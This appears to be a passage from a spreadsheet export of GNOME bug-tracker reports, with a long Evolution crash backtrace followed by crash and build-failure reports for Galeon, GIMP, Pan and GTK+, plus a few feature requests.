	rtype = 20
	static_scope = 0
	instance_and_params = (GValue *) 0xbffff1c0
	stack_values = {{g_type = 136408768 data = {{v_int = 136814176 
        v_uint = 136814176 v_long = 136814176 v_ulong = 136814176 
        v_int64 = 136814176 v_uint64 = 136814176 v_float =
5.04409034e-34 
        v_double = 6.7595184225677973e-316 v_pointer = 0x8279e60} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 135729552 data = {{v_int = -1073744848 v_uint =
3221222448 
        v_long = -1073744848 v_ulong = 3221222448 v_int64 =
3221222448 
        v_uint64 = 3221222448 v_float = -1.99963951 
        v_double = 1.5914953491694412e-314 v_pointer = 0xbffff430} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 3221221912 data = {{
        v_int = 1096309883 v_uint = 1096309883 v_long = 1096309883 
        v_ulong = 1096309883 v_int64 = 578896687051332731 
        v_uint64 = 578896687051332731 v_float = 13.5225782 
        v_double = 5.8334360017327771e-270 v_pointer = 0x41585c7b} {
        v_int = 134784752 v_uint = 134784752 v_long = 134784752 
        v_ulong = 134784752 v_int64 = 4429752048 v_uint64 =
4429752048 
        v_float = 4.11222454e-34 v_double = 2.1885883065117046e-314 
        v_pointer = 0x808a6f0}}} {g_type = 0 data = {{v_int = 0
v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 4294967296 v_uint64 =
4294967296 
        v_float = 0 v_double = 2.1219957909652723e-314 v_pointer =
0x0} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 =
4294967297 
        v_uint64 = 4294967297 v_float = 1.40129846e-45 
        v_double = 2.121995791459338e-314 v_pointer = 0x1}}} {
    g_type = 134784752 data = {{v_int = 134784888 v_uint = 134784888
        v_long = 134784888 v_ulong = 134784888 
        v_int64 = -4611701102217746568 v_uint64 = 13835042971491805048
        v_float = 4.11228699e-34 v_double = -1.9966507257290385 
        v_pointer = 0x808a778} {v_int = 1096315221 v_uint =
1096315221 
        v_long = 1096315221 v_ulong = 1096315221 
        v_int64 = 592142366192202069 v_uint64 = 592142366192202069 
        v_float = 13.527669 v_double = 4.4884591398963967e-269 
        v_pointer = 0x41587155}}} {g_type = 134784752 data = {{
        v_int = -1073745336 v_uint = 3221221960 v_long = -1073745336
        v_ulong = 3221221960 v_int64 = 7516189256 v_uint64 =
7516189256 
        v_float = -1.99958134 v_double = 3.7134908990306784e-314 
        v_pointer = 0xbffff248} {v_int = 134670008 v_uint = 134670008
        v_long = 134670008 v_ulong = 134670008 
        v_int64 = 4705023577823831736 v_uint64 = 4705023577823831736 
        v_float = 4.05953668e-34 v_double = 3617800.0627106093 
        v_pointer = 0x806e6b8}}} {g_type = 3221221992 data = {{
        v_int = 1096315620 v_uint = 1096315620 v_long = 1096315620 
        v_ulong = 1096315620 v_int64 = 578881396967764708 
        v_uint64 = 578881396967764708 v_float = 13.5280495 
        v_double = 5.8205830177814421e-270 v_pointer = 0x415872e4} {
        v_int = 134781176 v_uint = 134781176 v_long = 134781176 
        v_ulong = 134781176 v_int64 = 4429748472 v_uint64 =
4429748472 
        v_float = 4.11058252e-34 v_double = 2.188586539732955e-314 
        v_pointer = 0x80898f8}}} {g_type = 0 data = {{v_int = 0
v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 578892150469558272 
        v_uint64 = 578892150469558272 v_float = 0 
        v_double = 5.829622509642846e-270 v_pointer = 0x0} {
        v_int = -1073745288 v_uint = 3221222008 v_long = -1073745288
        v_ulong = 3221222008 v_int64 = 4703213033151787640 
        v_uint64 = 4703213033151787640 v_float = -1.99958706 
        v_double = 2774699.4999983869 v_pointer = 0xbffff278}}} {
    g_type = 1096313919 data = {{v_int = 134781176 v_uint = 134781176
        v_long = 134781176 v_ulong = 134781176 
        v_int64 = -4611700758620366600 v_uint64 = 13835043315089185016
        v_float = 4.11058252e-34 v_double = -1.9967270196735267 
        v_pointer = 0x80898f8} {v_int = 1096309883 v_uint =
1096309883 
        v_long = 1096309883 v_ulong = 1096309883 
        v_int64 = 578881396967758971 v_uint64 = 578881396967758971 
        v_float = 13.5225782 v_double = 5.8205830177766195e-270 
        v_pointer = 0x41585c7b}}} {g_type = 134781176 data = {{v_int =
1 
        v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1
        v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 
        v_pointer = 0x1} {v_int = 137868888 v_uint = 137868888 
        v_long = 137868888 v_ulong = 137868888 v_int64 = 4432836184 
        v_uint64 = 4432836184 v_float = 5.52839034e-34 
        v_double = 2.1901120721564068e-314 v_pointer = 0x837b658}}} {
    g_type = 1 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1
        v_int64 = 578880743036420097 v_uint64 = 578880743036420097 
        v_float = 1.40129846e-45 v_double = 5.8200333171182529e-270 
        v_pointer = 0x1} {v_int = 134781328 v_uint = 134781328 
        v_long = 134781328 v_ulong = 134781328 
        v_int64 = -4611700552461936240 v_uint64 = 13835043521247615376
        v_float = 4.11065232e-34 v_double = -1.996772796040748 
        v_pointer = 0x8089990}}} {g_type = 1096315221 data = {{
        v_int = 134782000 v_uint = 134782000 v_long = 134782000 
        v_ulong = 134782000 v_int64 = 578880743171202096 
        v_uint64 = 578880743171202096 v_float = 4.11096088e-34 
        v_double = 5.8200334304172328e-270 v_pointer = 0x8089c30} {
        v_int = -1073745208 v_uint = 3221222088 v_long = -1073745208
        v_ulong = 3221222088 v_int64 = 7516189384 v_uint64 =
7516189384 
        v_float = -1.9995966 v_double = 3.713490962271081e-314 
        v_pointer = 0xbffff2c8}}} {g_type = 134784024 data = {{
        v_int = 1096386608 v_uint = 1096386608 v_long = 1096386608 
        v_ulong = 1096386608 v_int64 = -4611700414061377488 
        v_uint64 = 13835043659648174128 v_float = 13.5957489 
        v_double = -1.9968035271381375 v_pointer = 0x41598830} {
        v_int = 1096315620 v_uint = 1096315620 v_long = 1096315620 
        v_ulong = 1096315620 v_int64 = 585871198543966948 
        v_uint64 = 585871198543966948 v_float = 13.5280495 
        v_double = 1.6498960385716002e-269 v_pointer = 0x415872e4}}}
{
    g_type = 134678668 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 1 v_uint64 = 1 v_float =
1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1} {v_int =
0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 =
4705023577689161728 
        v_uint64 = 4705023577689161728 v_float = 0 v_double = 3617800
        v_pointer = 0x0}}} {g_type = 3221222152 data = {{v_int =
1095154170 
        v_uint = 1095154170 v_long = 1095154170 v_ulong = 1095154170
        v_int64 = 4708632429349747194 v_uint64 = 4708632429349747194 
        v_float = 12.4204044 v_double = 6402301.0199418012 
        v_pointer = 0x4146b9fa} {v_int = 134678668 v_uint = 134678668
        v_long = 134678668 v_ulong = 134678668 
        v_int64 = -4611700208864655220 v_uint64 = 13835043864844896396
        v_float = 4.06351316e-34 v_double = -1.9968490899632654 
        v_pointer = 0x807088c}}} {g_type = 1096309883 data = {{
        v_int = 136408768 v_uint = 136408768 v_long = 136408768 
        v_ulong = 136408768 v_int64 = 578440474665250496 
        v_uint64 = 578440474665250496 v_float = 4.85793612e-34 
        v_double = 5.4499397016224049e-270 v_pointer = 0x8216ec0} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 
        v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 20
	param_values = (GValue *) 0xbffff1d4
	node = (SignalNode *) 0x8171870
	i = 1
	n_params = 1
#17 0x4157b3ff in g_signal_emit (instance=0x8279e60 signal_id=79
detail=0)
    at gsignal.c:2239
	var_args = 0xbffff34c 0Ã´Ã¿Â¿\200Ã³Ã¿Â¿Ãˆ
#18 0x411f3076 in gtk_widget_event_internal (widget=0x8279e60 
    event=0xbffff430) at gtkwidget.c:3563
	signal_num = 26
	return_val = 0
#19 0x411f2d5b in gtk_widget_send_expose (widget=0x8279e60
event=0xbffff430)
    at gtkwidget.c:3403
No locals.
#20 0x410d3d40 in gtk_main_do_event (event=0xbffff430) at
gtkmain.c:1545
	event_widget = (GtkWidget *) 0x8279e60
	grab_widget = (GtkWidget *) 0x8279e60
	window_group = (GtkWindowGroup *) 0x8362588
	next_event = (GdkEvent *) 0x0
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = (GList *) 0x41467b67
#21 0x4146e76c in gdk_window_process_updates_internal
(window=0x837b5f8)
    at gdkwindow.c:2052
	window_rect = {x = 0 y = 0 width = 840 height = 792}
	expose_region = (GdkRegion *) 0xe84f1b0
	window_region = (GdkRegion *) 0xe6c18a0
	event = {type = GDK_EXPOSE any = {type = GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h'} expose = {type =
GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' area = {x = 0 y = 0 
      width = 840 height = 792} region = 0xe84f1b0 count = 0}
no_expose = {
    type = GDK_EXPOSE window = 0x837b5f8 send_event = 104 'h'} 
  visibility = {type = GDK_EXPOSE window = 0x837b5f8 send_event = 104
'h' 
    state = GDK_VISIBILITY_UNOBSCURED} motion = {type = GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' time = 0 
    x = 1.7824764644108287e-311 y = 1.0051132076068889e-238 axes =
0x0 
    state = 1 is_hint = 1 device = 0x1 x_root =
5.830315817495297e-270 
    y_root = 5959726.9999972805} button = {type = GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' time = 0 
    x = 1.7824764644108287e-311 y = 1.0051132076068889e-238 axes =
0x0 
    state = 1 button = 1 device = 0x1 x_root =
5.830315817495297e-270 
    y_root = 5959726.9999972805} scroll = {type = GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' time = 0 
    x = 1.7824764644108287e-311 y = 1.0051132076068889e-238 state = 0
    direction = GDK_SCROLL_DOWN device = 0x1 
    x_root = 5.449939586955949e-270 y_root = -1.9972153009241591} key
= {
    type = GDK_EXPOSE window = 0x837b5f8 send_event = 104 'h' time =
0 
    state = 0 keyval = 840 length = 792 string = 0xe84f1b0 \002 
    hardware_keycode = 0 group = 0 '\0'} crossing = {type =
GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' subwindow = 0x0 time = 0
    x = 1.6806206668595108e-311 y = 1.2035125302194527e-315 
    x_root = 2.121995791459338e-314 y_root = 5.449939586955949e-270 
    mode = 134784024 detail = 3221222552 focus = 1096203275 
    state = 137780392} focus_change = {type = GDK_EXPOSE window =
0x837b5f8 
    send_event = 104 'h' in = -16385} configure = {type = GDK_EXPOSE
    window = 0x837b5f8 send_event = 104 'h' x = 0 y = 0 width = 840
    height = 792} property = {type = GDK_EXPOSE window = 0x837b5f8 
    send_event = 104 'h' atom = 0x0 time = 0 state = 840} selection
= {
    type = GDK_EXPOSE window = 0x837b5f8 send_event = 104 'h' 
    selection = 0x0 target = 0x0 property = 0x348 time = 792 
    requestor = 243593648} proximity = {type = GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' time = 0 device = 0x0} 
  client = {type = GDK_EXPOSE window = 0x837b5f8 send_event = 104 'h'
    message_type = 0x0 data_format = 0 data = {
      b =
H\003\000\000\030\003\000\000Â°Ã±\204\016\000\000\000\000\001\000\000
s = {840 0 792 0 -3664 3716 0 0 1 0} l = {840 792 243593648
0 
        1}}} dnd = {type = GDK_EXPOSE window = 0x837b5f8 
    send_event = 104 'h' context = 0x0 time = 0 x_root = 840 y_root
= 0} 
  window_state = {type = GDK_EXPOSE window = 0x837b5f8 send_event =
104 'h' 
    changed_mask = 0 new_window_state = 0} setting = {type =
GDK_EXPOSE 
    window = 0x837b5f8 send_event = 104 'h' action =
GDK_SETTING_ACTION_NEW 
    name = 0x0}}
	width = 840
	height = 792
	update_area = (GdkRegion *) 0x83e13b8
	private = (GdkWindowObject *) 0x837b5f8
	save_region = 1
#22 0x4146e894 in gdk_window_process_all_updates () at gdkwindow.c:2099
	old_update_windows = (GSList *) 0x832a088
	tmp_list = (GSList *) 0x842b2b0
#23 0x4146e8f7 in gdk_window_update_idle (data=0x0) at gdkwindow.c:2113
No locals.
#24 0x415cc079 in g_idle_dispatch (source=0x83c86d0 
    callback=0x4146e8ca  user_data=0x0)
    at gmain.c:3750
No locals.
#25 0x415c854d in g_main_dispatch (context=0x8094870) at gmain.c:1895
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0x415cc031 
	was_in_call = 0
	user_data = 0x0
	callback = 0x4146e8ca 
	cb_funcs = (GSourceCallbackFuncs *) 0x41628abc
	cb_data = 0xe83b690
	need_destroy = 1073841184
	source = (GSource *) 0x83c86d0
	depth = (gint *) 0x809e5f8
	i = 0
#26 0x415c98b9 in g_main_context_dispatch (context=0x8094870) at
gmain.c:2441
No locals.
#27 0x415c9dec in g_main_context_iterate (context=0x8094870 block=1 
    dispatch=1 self=0x80752f0) at gmain.c:2522
	max_priority = 120
	timeout = 0
	some_ready = 1
	nfds = 8
	allocated_nfds = 10
	fds = (GPollFD *) 0x8138ad8
#28 0x415ca643 in g_main_loop_run (loop=0x80fc998) at gmain.c:2726
	self = (GThread *) 0x80752f0
#29 0x407c09ff in bonobo_main () at bonobo-main.c:297
	loop = (GMainLoop *) 0x80fc998
#30 0x08064fc3 in main (argc=1 argv=0xbffff874) at main.c:605
	options = {{longName = 0x806c332 component shortName = 99 'c' 
    argInfo = 1 arg = 0x806e81c val = 0 
    descrip = 0x806c340 Start Evolution activating the specified
component 
    argDescrip = 0x0} {longName = 0x806c373 offline shortName = 0
'\0' 
    argInfo = 0 arg = 0x806e80c val = 0 
    descrip = 0x806c37b Start in offline mode argDescrip = 0x0} {
    longName = 0x806c391 online shortName = 0 '\0' argInfo = 0 
    arg = 0x806e808 val = 0 descrip = 0x806c398 Start in online
mode 
    argDescrip = 0x0} {longName = 0x806c3ad force-shutdown 
    shortName = 0 '\0' argInfo = 0 arg = 0x806e814 val = 0 
    descrip = 0x806c3c0 Forcibly shut down all evolution components 
    argDescrip = 0x0} {longName = 0x806c3ec force-migrate 
    shortName = 0 '\0' argInfo = 0 arg = 0x806e818 val = 0 
    descrip = 0x806c400 Forcibly re-migrate from Evolution 1.4 
    argDescrip = 0x0} {longName = 0x806c427 debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x806e820 val = 0 
    descrip = 0x806c440 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x806c477 setup-only
shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x806e810 val = 0 descrip = 0x0 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 4
    arg = 0x806e648 val = 0 descrip = 0x806c482 Help options: 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgr</t>
  </si>
  <si>
    <t>GLIB-523742</t>
  </si>
  <si>
    <t>Use noinst for non-installable libraries</t>
  </si>
  <si>
    <t>Instead of the hack in tests/Makefile.am to make automake not install the test libraries you can use noinst_LTLIBRARIES.</t>
  </si>
  <si>
    <t>F-SPOT-474704</t>
  </si>
  <si>
    <t>Browsing</t>
  </si>
  <si>
    <t>More intuitive way of activating the magnifier</t>
  </si>
  <si>
    <t>There is a very good feature in F-Spot already - the magnifier which can be activated by pressing (or holdnig in browse mode) the V key. But this useful thing is somewhat hidden (maybe for some reason?) from user who didn't read the manual. There is no icon in the toolbar or some item in the view menu.
I hope that it will be not too hard to implement this. It will extend the functionality of F-Spot (and be a nice surprise indeed) for many users.
Other information:</t>
  </si>
  <si>
    <t>jan.nekvasil</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-681752</t>
  </si>
  <si>
    <t>Build fails because of missing nm-wireless-dialog.h</t>
  </si>
  <si>
    <t>When building g-c-c with jhbuild it fails with message
network-dialogs.c:32:32: fatal error: nm-wireless-dialog.h: No such file or directory
compilation terminated.
Simply removing references to this header file does not solve the build issue.</t>
  </si>
  <si>
    <t>GNOME-LIBS-78479</t>
  </si>
  <si>
    <t>Galeon crash after trying to load a newsgroup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: 1.2.0
Synopsis: Galeon crash after trying to load a newsgroup
Bugzilla-Product: galeon
Bugzilla-Component: Mozilla interaction
Description:
Description of Problem:
I clicked on a link to a newsgroup (news://something.blah) and galeon
asked me if I wanted to subscriebe to the newsgroup.  I said yes and was
suprised to see galeon load the newsgroup/mail component from mozilla in
a new window but with galeon as the title.  I set up a new nntp server
and whatnot and when I clicked ont the newsgroup I wanted to subscribe
to  galeon crashed.
Steps to reproduce the problem:
1. Click on nntp/news link
2. Create new nntp server setting
3. Click on the newsgroup to subscribe to and subscribe
Actual Results:
Crash
Expected Results:
Newsgroup headers display
How often does this happen?
First time I've tried it
Additional Information:
I'm amazed at how solid galeon/mozilla have become!  I've probably
rendered several thousand (horribley written) pages toady and it's only
when using a new feature that galeon finally crashed.  Keep up the great
work.
Debugging Information:
Core was generated from '/usr/bin/galeon-bin'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ew Thread 1024 (LWP 30798)]
[New Thread 2049 (LWP 30842)]
[New Thread 1026 (LWP 30843)]
[New Thread 2051 (LWP 30844)]
[New Thread 3076 (LWP 30881)]
[New Thread 13317 (LWP 11735)]
0x41070989 in wait4 () from /lib/libc.so.6
#0  0x41070989 in wait4 () from /lib/libc.so.6
#1  0x410ef0c4 in __check_rhosts_file () from /lib/libc.so.6
#2  0x40ad0e56 in waitpid (pid=11737 stat_loc=0xbfffec7c options=0)
    at wrapsyscall.c:172
#3  0x40888ea9 in gnome_icon_entry_get_type () from
/usr/lib/libgnomeui.so.32
#4  0x40fe37f8 in killpg () from /lib/libc.so.6
#5  0x42fca4f2 in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
#6  0x42fd9459 in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
#7  0x42fde39d in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
#8  0x4280aa19 in nsMsgProtocol::OnDataAvailable ()
   from /usr/lib/libmsgbaseutil.so
#9  0x4135ad39 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#10 0x41343fc6 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#11 0x400fa593 in PL_HandleEvent () from /usr/lib/libxpcom.so
#12 0x400f9a09 in PL_ProcessPendingEvents () from /usr/lib/libxpcom.so
#13 0x400fb191 in nsEventQueueImpl::ProcessPendingEvents ()
   from /usr/lib/libxpcom.so
#14 0x41846b55 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#15 0x418468fe in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
Thread 6 (Thread 13317 (LWP 11735)):
#0  0x40fe3a32 in sigsuspend () from /lib/libc.so.6
#1  0x40acddc0 in __pthread_wait_for_restart_signal (self=0xbf1ffc00)
    at pthread.c:1004
#2  0x40ac9f2c in pthread_cond_wait (cond=0x81ce51c mutex=0x81c1de0)
    at restart.h:34
#3  0x4016e7c0 in PR_WaitCondVar () from /usr/lib/libnspr4.so
#4  0x400fd572 in nsThreadPool::GetRequest () from /usr/lib/libxpcom.so
#5  0x400fdaeb in nsThreadPoolRunnable::Run () from
/usr/lib/libxpcom.so
#6  0x400fdc17 in nsThread::Main () from /usr/lib/libxpcom.so
#7  0x4017443a in PR_SetSysfdTableSize () from /usr/lib/libnspr4.so
#8  0x40acb0ae in pthread_start_thread (arg=0xbf1ffc00) at
manager.c:291
Thread 5 (Thread 3076 (LWP 30881)):
#0  0x41070d31 in nanosleep () from /lib/libc.so.6
#1  0x40acd893 in __pthread_timedsuspend_new (self=0xbf3ffc00 
    abstime=0xbf3ffa0c) at pthread.c:1151
#2  0x40aca1af in pthread_cond_timedwait_relative (cond=0x821559c 
    mutex=0x8215538 abstime=0xbf3ffa0c) at restart.h:45
#3  0x4016dacd in PR_FormatTime () from /usr/lib/libnspr4.so
#4  0x4016e7d3 in PR_WaitCondVar () from /usr/lib/libnspr4.so
#5  0x400ffef5 in TimerThread::Run () from /usr/lib/libxpcom.so
#6  0x400fdc17 in nsThread::Main () from /usr/lib/libxpcom.so
#7  0x4017443a in PR_SetSysfdTableSize () from /usr/lib/libnspr4.so
#8  0x40acb0ae in pthread_start_thread (arg=0xbf3ffc00) at
manager.c:291
Thread 4 (Thread 2051 (LWP 30844)):
#0  0x40fe3a32 in sigsuspend () from /lib/libc.so.6
#1  0x40acddc0 in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:1004
#2  0x40ac9f2c in pthread_cond_wait (cond=0x81ce31c mutex=0x81ee620)
    at restart.h:34
#3  0x4016e7c0 in PR_WaitCondVar () from /usr/lib/libnspr4.so
#4  0x4136270d in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#5  0x41360ecc in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#6  0x400fdc17 in nsThread::Main () from /usr/lib/libxpcom.so
#7  0x4017443a in PR_SetSysfdTableSize () from /usr/lib/libnspr4.so
#8  0x40acb0ae in pthread_start_thread (arg=0xbf5ffc00) at
manager.c:291
Thread 3 (Thread 1026 (LWP 30843)):
#0  0x4109ca44 in poll () from /lib/libc.so.6
#1  0x40171047 in PR_MakeDir () from /usr/lib/libnspr4.so
#2  0x41357afd in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#3  0x400fdc17 in nsThread::Main () from /usr/lib/libxpcom.so
#4  0x4017443a in PR_SetSysfdTableSize () from /usr/lib/libnspr4.so
#5  0x40acb0ae in pthread_start_thread (arg=0xbf7ffc00) at
manager.c:291
Thread 2 (Thread 2049 (LWP 30842)):
#0  0x4109ca44 in poll () from /lib/libc.so.6
#1  0x40acadf6 in __pthread_manager (arg=0xf) at manager.c:142
Thread 1 (Thread 1024 (LWP 30798)):
#0  0x41070989 in wait4 () from /lib/libc.so.6
#1  0x410ef0c4 in __check_rhosts_file () from /lib/libc.so.6
#2  0x40ad0e56 in waitpid (pid=11737 stat_loc=0xbfffec7c options=0)
    at wrapsyscall.c:172
#3  0x40888ea9 in gnome_icon_entry_get_type () from
/usr/lib/libgnomeui.so.32
#4  0x40fe37f8 in killpg () from /lib/libc.so.6
#5  0x42fca4f2 in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
#6  0x42fd9459 in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
#7  0x42fde39d in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
#8  0x4280aa19 in nsMsgProtocol::OnDataAvailable ()
   from /usr/lib/libmsgbaseutil.so
#9  0x4135ad39 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#10 0x41343fc6 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
#11 0x400fa593 in PL_HandleEvent () from /usr/lib/libxpcom.so
#12 0x400f9a09 in PL_ProcessPendingEvents () from /usr/lib/libxpcom.so
#13 0x400fb191 in nsEventQueueImpl::ProcessPendingEvents ()
   from /usr/lib/libxpcom.so
#14 0x41846b55 in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#15 0x418468fe in NSGetModule ()
   from /usr/lib/mozilla/components/libwidget_gtk.so
#0  0x41070989 in wait4 () from /lib/libc.so.6
#0  0x41070989 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x410ef0c4 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x40ad0e56 in waitpid (pid=11737 stat_loc=0xbfffec7c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffec7c
options = 0
result = 0
oldtype = 0
#3  0x40888ea9 in gnome_icon_entry_get_type () from
/usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x40fe37f8 in killpg () from /lib/libc.so.6
No symbol table info available.
#5  0x42fca4f2 in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
No symbol table info available.
#6  0x42fd9459 in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
No symbol table info available.
#7  0x42fde39d in NSGetModule () from
/usr/lib/mozilla/components/libmsgnews.so
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-04-12 02:36 -------
Unknown version 1.2.x in product galeon. Setting version to the default unspecified.
Reassigning to the default owner of the component philipl@mail.utexas.edu.
</t>
  </si>
  <si>
    <t>danelder</t>
  </si>
  <si>
    <t>GIMP-469785</t>
  </si>
  <si>
    <t>gimp crashes on zoom out after rotate</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. make a new image e.g. 1000x1000 pixels
2. shrink the window so the image is bigger than the window
3. rotate the image by 1 degree (or -1 or probably any number)
4. press control-shift-E to get the whole image inside the windoe
5. up comes bug-buddy gimp has crashed.
Stack trace:
I can recompile and attach a stack trace tomorrow I'm not getting anything useful sorry.
Other information:
if you flatten the image before zooming out there's no problem but if you then undo the flatten with gimp zoomed out it crashes.</t>
  </si>
  <si>
    <t>liam</t>
  </si>
  <si>
    <t>PAN-111435</t>
  </si>
  <si>
    <t>0.13.95 segfault</t>
  </si>
  <si>
    <t>From: Dave C. 
Hi
        I am using pan 0.13.95. Kernel 2.4.20 glibc 2.2.5 gtk 2.2         
glib 2.2. Pan is segfaulting and I don't know why. I am including the         
backtrace script so you guys can trouble shoot.</t>
  </si>
  <si>
    <t>GTK+-437245</t>
  </si>
  <si>
    <t>segmentation fault when using negative value in gtk.ListStore.insert function</t>
  </si>
  <si>
    <t>Steps to reproduce:
python -c 'import gtk model = gtk.ListStore(str) model.insert(-2(string))'
Stack trace:
$ gdb --args python -c 'import gtk model = gtk.ListStore(str) model.insert(-2(string))'
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i486-linux-gnu...
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(gdb) run
Starting program: /usr/bin/python -c import\ gtk\\ model\ =\ gtk.ListStore\(str\)\\ model.insert\(-2\(\string\\)\)
[Thread debugging using libthread_db enabled]
[New Thread -1210382656 (LWP 6506)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1210382656 (LWP 6506)]
_gtk_sequence_node_find_by_pos (node=0x82a2f98 pos=-2) at gtksequence.c:761
761     gtksequence.c: No such file or directory.
        in gtksequence.c
(gdb) thread apply all bt
Thread 1 (Thread -1210382656 (LWP 6506)):
#0  _gtk_sequence_node_find_by_pos (node=0x82a2f98 pos=-2) at gtksequence.c:761
#1  0xb77fda3f in IA__gtk_list_store_insert_with_valuesv (list_store=0x82bc840 iter=0xbf9a3d64 position=-2 columns=0x81becb0 values=0x82a3140 n_values=1)
    at gtkliststore.c:1911
#2  0xb7acc12e in ?? () from /var/lib/python-support/python2.5/gtk-2.0/gtk/_gtk.so
#3  0x082bc840 in ?? ()
#4  0xbf9a3d64 in ?? ()
#5  0xfffffffe in ?? ()
#6  0x081becb0 in ?? ()
#7  0x082a3140 in ?? ()
#8  0x00000001 in ?? ()
#9  0x8c6cde61 in ?? ()
#10 0xb7d44a80 in ?? ()
#11 0xbf9a3d64 in ?? ()
#12 0xb7be9db8 in ?? () from /var/lib/python-support/python2.5/gtk-2.0/gtk/_gtk.so
#13 0x081faa50 in ?? ()
#14 0x081becb0 in ?? ()
#15 0x00000001 in ?? ()
#16 0x082a3140 in ?? ()
#17 0x082a3154 in ?? ()
#18 0x0808936f in PyObject_GenericGetAttr (obj=0xb7d45f2c name=0xb7d44b8c) at ../Objects/object.c:1348
#19 0x080c8a7c in PyEval_EvalFrameEx (f=0x817bdcc throwflag=0) at ../Python/ceval.c:3564
#20 0x080c9ca5 in PyEval_EvalCodeEx (co=0xb7d37578 globals=0xb7d88acc locals=0xb7d88acc args=0x0 argcount=0 kws=0x0 kwcount=0 defs=0x0 defcount=0
    closure=0x0) at ../Python/ceval.c:2831
#21 0x080c9d17 in PyEval_EvalCode (co=0xb7d37578 globals=0xb7d88acc locals=0xb7d88acc) at ../Python/ceval.c:494
#22 0x080e9df2 in PyRun_StringFlags (str=0x816a008 import gtk model = gtk.ListStore(str) model.insert(-2(\string\))\n start=257 globals=0xb7d88acc
    locals=0xb7d88acc flags=0xbf9a4108) at ../Python/pythonrun.c:1271
#23 0x080e9eb5 in PyRun_SimpleStringFlags (command=0x816a008 import gtk model = gtk.ListStore(str) model.insert(-2(\string\))\n flags=0xbf9a4108)
    at ../Python/pythonrun.c:898
#24 0x08058d5e in Py_Main (argc=1 argv=0xbf9a41d4) at ../Modules/main.c:512
#25 0x08058862 in main (argc=0 argv=0x0) at ../Modules/python.c:23
(gdb)
Other information:
i known that is not a common way to fill a ListStore...
Note:
python version is 2.5.1
Distribution Ubuntu Feisty 7.04</t>
  </si>
  <si>
    <t>theli48</t>
  </si>
  <si>
